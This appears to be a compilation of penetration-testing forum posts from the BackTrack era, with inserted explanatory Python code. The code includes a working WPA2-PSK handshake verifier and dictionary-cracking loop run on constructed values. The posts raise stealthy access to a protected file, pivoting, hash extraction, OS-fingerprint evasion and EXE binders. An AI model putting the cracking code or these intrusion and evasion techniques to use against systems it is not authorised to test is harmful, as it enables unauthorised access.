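    s.close()
    return port


def demo():
    """Classify a wrapped-style port, a banner-sending port and a closed port."""
    wrapped = start_server(lambda conn: None)                               # deny: close at once
    banner = start_server(lambda conn: conn.sendall(b"SSH-2.0-demo\r\n"))  # constructed banner
    return (classify_port("127.0.0.1", wrapped),
            classify_port("127.0.0.1", banner),
            classify_port("127.0.0.1", free_port()))


if __name__ == "__main__":
    print(demo())
```

The "open-silent" branch matters in practice: an unwrapped HTTP or SMB daemon also sends nothing first, but it keeps the connection open until the client speaks, whereas a wrapped service closes within milliseconds of the handshake. Running the probe from the host you are bouncing through versus from your own machine shows you which source the ACL trusts, without any poisoning.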
remote-exploit & backtrack
Hello all,
So a professor of my Computer Security course, together with the campus IT director, has offered my class a challenge. They've placed a file (aptly named secret.txt) with a secret word/phrase/something in a protected folder, and are offering extra credit if we can figure out what that word is. We aren't allowed to destroy anything or inhibit use of the server to other students, but past that anything (sans physical coercion and blackmail) goes.
The server is running SunOS 5.9. The folder, and all files within it that I know of, have 700 permissions, and both accounts I have access to are in the students group, whereas he's in the faculty group. We can print the shadowed /etc/passwd, but permission is denied to read or copy /etc/shadow.
We'll get credit whether we get caught or not, but ideas that get the secret word without alerting anybody are preferable. I'm familiar with unix/linux, but not so much with penetrating it. I come to you asking for advice and guidance in things to learn about that would aid me in this endeavor.
Thank you
11:54
remote-exploit & backtrack
I know this might sound pretty noobish to some of you professionals, but what is the best way to determine what exploits will work on a victim machine? I know Nmap is good for finding ports, but what is the method everyone uses to know which exploit to choose that will apply? I am running boxes with Win XP SP2 and SP3 and my host with BT4 final.
6:21
remote-exploit & backtrack
HI all;
I need help. I am searching for a tool that could list all subdomains for a target domain, e.g. .edu.*. I would like to collect all subdomains of this target. For example, I tried goorecon but it returned only 60 subdomains for my target; on the other hand, when searching manually through Google I found 200 subdomains.
21:26
remote-exploit & backtrack
Hi, I am doing some Pentesting at school with full permission of the target and the school. I am trying to either exploit it or use social engineering. I would prefer to try and exploit it because that would be more immediate. I looked in the exploit database but did not find an exploit. If either you can point me to an exploit in the database or some other form of exploit I would appreciate it. MITM is an option but I would prefer not to do that as I do not want to try it on a production network even though I am allowed to.
11:17
remote-exploit & backtrack
hey guys,
So I've been working with Metasploit on normal internal networks at home. Everything works great there. Now I've wanted to go to the next level and see how everything works on a domain. So I've set up a small server at home and a domain to log into. I have a client log onto the server. I connect to this client using Meterpreter, etc. So until now everything was jolly. Now when I try to take over the root account or SYSTEM of the computer that I've exploited, I can't migrate to SYSTEM. I think it has something to do with the fact that I'm logged onto the server and not the local account. Any idea on how to compromise the local account? Or, even better, the server that the computer is logged into?
I know it's a lot to read through, but I appreciate the help.
squib
4:52
remote-exploit & backtrack
hi guys,
I have tried to use windows/browser/ie_aurora.
My internet connection is by a router, so my public IP address is different from the local one.
So when I use ie_aurora it works fine if I use 192.168.1.104 (local intranet address) but if I use my public address like 82.34.XXX.XXX as SRVHOST and LHOST:
msf exploit(ie_aurora) >
[-] Handler failed to bind to 82.34.XXX.XXX:4444
[-] Handler failed to bind to 0.0.0.0:4444
[-] Exploit failed: The address is already in use (0.0.0.0:4444).
[*] Server stopped.
Do you know how I can start the server if I am behind a router?
Thanks,
Mister|x
13:56
remote-exploit & backtrack
During a recent discussion with co-workers over lunch, the topic of offensive security came up. Preferring offensive security over anything else, I chimed in and explained the glorious difference in study and skill development methods between offensive and defensive security ideologies.
Offensive security and everything it encapsulates can be seen as a sport. There are techniques, tricks, methods, styles, different platforms, etc. all at your disposal to use to your liking. You're taking your keyboard and turning it into a controller that can potentially do as much damage as you allow yourself to learn. Offensive security can be practiced. You can even increase the speed with which you attack. The list goes on.
Defensive security is boring. It's preventive. Write your policies, set up your controls, audit, report. ZZZZZ. Is this what I got into security for? No. Hardly. Not even close, in fact. Anyway...
It came to mind that if offensive security can be considered a sport, why not train like an athlete? Yes, it's good to know the general concepts, tools, and how to use them, but how is that really effective in today's fast-paced cyber-terrorism world? If you're not trained to detect, react, and attack appropriately, you're bound to become useless. The combination of both knowledge and disciplined ability will be invaluable.
I would imagine that a training curriculum for offensive security could take the security skills you already have, and hone them into militant abilities and at the same time, teach new methods. Not only would there be a program to follow for disciplined learning, but common offensive security tasks as well as attacks would become so ingrained into an individual, they would never have to stop, hesitate, or look up a procedure that was merely foggy or forgotten.
Does anyone have such a program or training curriculum?
How do you keep your skills sharp?
Would anyone be interested in developing such a curriculum with me?
11:17
remote-exploit & backtrack
hi,
is it possible to use the autopwn function to check a host if it would be possible to be exploited without exploiting it?
or is there any other way to check a host against all exploits from metasploit without compromising the host?
20:25
remote-exploit & backtrack
Hey guys, did a search but am looking for a more specific answer.
Right, I'm doing a little pentest on my AP which uses WPA-PSK.
I used my netbook to run BT4, then I successfully de-authed my targeted workstation (my desktop using Wi-Fi) and captured the 4-way handshake into a capture file.
I then used the default aircrack word list (password.lst) to try and crack the handshake.
I then get KEY FOUND [ penelope]
I assume this means all is good and it's been cracked. However, I know this is not the password as it's set to "Chronicles2".
Yet doing another capture from my same BSSID, aircrack still tells me this is the key.
Why does aircrack tell me this is the key?
thanks.
I do have permission to crack the WPA passcode as I own the network, pay the bill and set up the AP. Just in case anyone asks =]
21:10
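An added example covering the two WPA posts above, the 10-character brute-force estimate and the "penelope" KEY FOUND puzzle. This is editor's code, not from either poster or from aircrack-ng, but it performs the same test aircrack-ng runs on every dictionary word: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096, 32), PTK = PRF-512 over the two MACs and two nonces, and the first 16 bytes of the PTK (the KCK) key an HMAC over message 2 of the handshake with its MIC field zeroed. A word is reported as the key purely because that HMAC equals the MIC in the capture, so a damaged or mismatched handshake can make a wrong word "match" while the real passphrase does not. The SSID "example-ap", the MAC addresses, the nonces and the EAPOL frame are constructed here; the passphrase is the one the second poster says is set. brute_force_seconds() is the keyspace arithmetic from the first post.

```python
"""Added example: WPA2-PSK handshake verification, word by word, plus the
exhaustive-search time estimate. Handshake values are constructed for the demo."""
import hashlib
import hmac
import struct

MIC_OFFSET = 81  # EAPOL-Key frame: 4-byte EAPOL header + 77 bytes of fields before the MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """802.11i PMK: PBKDF2-HMAC-SHA1 over the passphrase, salted with the SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PRF-512(PMK, "Pairwise key expansion", min/max of the MACs || min/max of the nonces)."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = [hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]        # 4 x 20 bytes, truncated to the 64 we need
    return b"".join(blocks)[:64]


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """MIC over the EAPOL-Key frame with its MIC field zeroed; the algorithm follows
    the key descriptor version in the low 3 bits of Key Information."""
    version = struct.unpack(">H", frame[5:7])[0] & 0x7
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    if version == 1:                    # WPA (TKIP): HMAC-MD5
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]   # WPA2 (CCMP): HMAC-SHA1-128


def candidate_matches(passphrase, ssid, ap_mac, sta_mac, anonce, snonce, frame) -> bool:
    """The whole per-word test: derive the KCK, recompute the MIC, compare with the captured one."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


def crack(wordlist, ssid, ap_mac, sta_mac, anonce, snonce, frame):
    """Dictionary attack: the first word whose MIC matches is what gets reported as KEY FOUND."""
    for word in wordlist:
        if candidate_matches(word, ssid, ap_mac, sta_mac, anonce, snonce, frame):
            return word
    return None


def brute_force_seconds(charset_size: int, length: int, keys_per_second: float) -> float:
    """Worst-case time to try every permutation of `length` symbols from `charset_size`."""
    return charset_size ** length / keys_per_second


def build_eapol_msg2(kck: bytes, snonce: bytes, replay_counter: int = 1) -> bytes:
    """Constructed handshake message 2 (STA -> AP, carries SNonce and MIC), WPA2 key
    descriptor version 2, empty key data. Exists only to fabricate demo input."""
    key_info = 0x0100 | 0x0008 | 2      # MIC flag | pairwise | descriptor version 2
    body = (bytes([2]) + struct.pack(">HHQ", key_info, 0, replay_counter) + snonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8)      # descriptor type, key IV, RSC, key ID
    frame = struct.pack(">BBH", 2, 3, len(body) + 16 + 2) + body + b"\x00" * 16 + struct.pack(">H", 0)
    return frame[:MIC_OFFSET] + eapol_mic(kck, frame) + frame[MIC_OFFSET + 16:]


# Constructed handshake parameters (not from any real capture).
SSID = "example-ap"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
TRUE_PASSPHRASE = "Chronicles2"        # the passphrase the second poster says is configured
HANDSHAKE_MSG2 = build_eapol_msg2(
    ptk_from_pmk(pmk_from_passphrase(TRUE_PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)[:16], SNONCE)

if __name__ == "__main__":
    print(crack(["penelope", "password", TRUE_PASSPHRASE], SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, HANDSHAKE_MSG2))
    print("36^10 at 385 keys/s: %.0f years" % (brute_force_seconds(36, 10, 385) / 31557600))
```

Against a handshake that really was produced with "Chronicles2", "penelope" cannot match, so a capture on which it does match is the thing to question (re-capture cleanly and compare). The estimate side confirms the first poster's feeling: 36^10 candidates at 385 keys/s is on the order of 300,000 years, and crunch is not the bottleneck, the PBKDF2 derivation is; dictionaries and precomputed PMK tables for the specific SSID are the realistic shortcuts, not a faster permutation generator.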
remote-exploit & backtrack
Hello all,
My management has approved an audit of AD accounts looking for weak passwords
Since I have the server and backups I would have access to the NTDS.DIT file; is there a way to extract password hashes directly from it? I'm trying to avoid running LC or fgdump on the Active Directory domain controller.
I've searched high and low and have not been able to find an answer.
18:56
remote-exploit & backtrack
I have a training lab set up and I am having trouble trying to double pivot. I have a firewall exposing an FTP server; I have exploited the FTP server, scanned internally, and found some hosts. I set up a pivot through the FTP server and exploited a host; this host has a second NIC and another host behind it. I have set up another route through the host but I cannot get any of my exploits to work against the second host.
Just wondering if anyone has done this before, or if it is even possible to double up pivots.
If needed I can give more details, IPs and such...
Thanks for any help
12:06
remote-exploit & backtrack
Suppose you wanted to fool OS fingerprinting tools such as xprobe, nmap, etc. in order to make the initial information gathering phase harder.
In BSD you can set net.inet.udp.blackhole or even better, use pf's traffic normalization options.
Even the Windows world has seen a few tools to make your win* box appear as running a different OS.
In Linux, on the other hand, we had IPpersonality (ippersonality.sourceforge.net), iplog (ojnk.sourceforge.net) and morph (synacklabs.net) but they're now quite old and only work with 2.4 kernels.
So I was wondering if any of you can suggest alternatives? pf for linux anyone? :rolleyes:
22:05
remote-exploit & backtrack
Good or bad news depending on who cares, but the meterpreter reverse_tcp payload embedded in an exe or shellcode within another exe is now detected:
VirusTotal. MD5: c32f921f597c7f82f4b48a7604b6d860 Trojan Horse Trojan.Vilsel.omg Trojan:W32/Rozena.gen!A
Also, this was created with no encoders, although I don't think they would help.
14:00
remote-exploit & backtrack
As the title states - does anyone have recommendations on a good EXE-binder?
5:52
remote-exploit & backtrack
Hi all,
I know that we could set up a web server using Metasploit, but I can't access it over the internet; it's accessible inside the LAN but not over the net. Wondering why...
any help would be appreciated.
14:25
remote-exploit & backtrack
hi
I Hope this is the right place to ask this.
When I use Metasploit it works very well on my local network,
but when I want to pentest outside my local network it doesn't work.
Can someone tell me why?
9:56
remote-exploit & backtrack
First let me say, yes I know this isn't a nmap support forum and that if nobody here knows the answer to my question I will go ask on a nmap mailing list or something.
To the point. I'm wondering if anyone knows the scope of Nmap NSE scripts. Are they always associated with a port, or are there host-level NSE scripts as well? Think of this from the perspective of parsing Nmap XML output.
Personally I've only seen NSE output related to a port, but that doesn't mean that there isn't host-level NSE output that I just haven't managed to trigger yet.
Edit: Yes I know I typo'd the subject line :(
12:04
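An added example for the NSE question above (editor's code, not from the post or from the Nmap project). NSE scripts run under one of four rules, and the XML puts each kind somewhere different: portrule output is a <script> child of the <port> it ran against; hostrule output (smb-os-discovery, for instance) sits in a <hostscript> element directly under <host>; and from Nmap 5.20 on there are also prerule and postrule scripts whose output lands in <prescript> and <postscript> directly under <nmaprun>. A parser that only walks <port> elements misses the other three. The element names are Nmap's own; the document below, including the script output strings, is constructed.

```python
"""Added example: collect every NSE result from Nmap XML, tagged with the rule
that produced it. SAMPLE_XML is a constructed document, not a real scan."""
from collections import namedtuple
import xml.etree.ElementTree as ET

NseResult = namedtuple("NseResult", "scope host port script_id output")

# Constructed Nmap XML: one portrule, one hostrule, one prerule and one postrule result.
SAMPLE_XML = """
<nmaprun scanner="nmap" args="nmap -sC -oX - 192.0.2.10" start="0">
  <prescript>
    <script id="broadcast-dhcp-discover" output="constructed prerule output"/>
  </prescript>
  <host>
    <address addr="192.0.2.10" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh"/>
        <script id="ssh-hostkey" output="constructed portrule output"/>
      </port>
      <port protocol="tcp" portid="445">
        <state state="open" reason="syn-ack"/>
        <service name="microsoft-ds"/>
      </port>
    </ports>
    <hostscript>
      <script id="smb-os-discovery" output="constructed hostrule output"/>
    </hostscript>
  </host>
  <postscript>
    <script id="ssh-hostkey" output="constructed postrule output"/>
  </postscript>
</nmaprun>
"""


def nse_results(xml_text: str):
    """Walk all four places NSE output can appear and return them in document order.
    Only the flat `output` attribute is read; newer Nmap adds structured <table>/<elem>
    children under <script> that a fuller parser would also consume."""
    root = ET.fromstring(xml_text)
    results = []
    for s in root.findall("prescript/script"):                    # prerule: before any host
        results.append(NseResult("prerule", None, None, s.get("id"), s.get("output")))
    for host in root.findall("host"):
        addr = host.find("address").get("addr")                   # first <address>; a MAC may follow
        for port in host.findall("ports/port"):                   # portrule: nested in the port
            for s in port.findall("script"):
                results.append(NseResult("portrule", addr, int(port.get("portid")),
                                         s.get("id"), s.get("output")))
        for s in host.findall("hostscript/script"):               # hostrule: host-level, no port
            results.append(NseResult("hostrule", addr, None, s.get("id"), s.get("output")))
    for s in root.findall("postscript/script"):                   # postrule: after all hosts
        results.append(NseResult("postrule", None, None, s.get("id"), s.get("output")))
    return results


if __name__ == "__main__":
    for r in nse_results(SAMPLE_XML):
        print(r.scope, r.host, r.port, r.script_id, "->", r.output)
```

So for the poster's use case: host-level output exists and is common (the smb-*, nbstat and OS-related scripts are hostrule scripts), it will never show up under a port, and a results table keyed on (host, port) needs a null-port row, or a separate table, to hold it.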
remote-exploit & backtrack
I was recently asked a question about ODBC connections to a SQL server and the possibility of MITM or sniffing attacks. Can someone point me to something that discusses this? I've had a hard time finding much about it, hopefully someone here can dump some knowledge.
Thanks,
C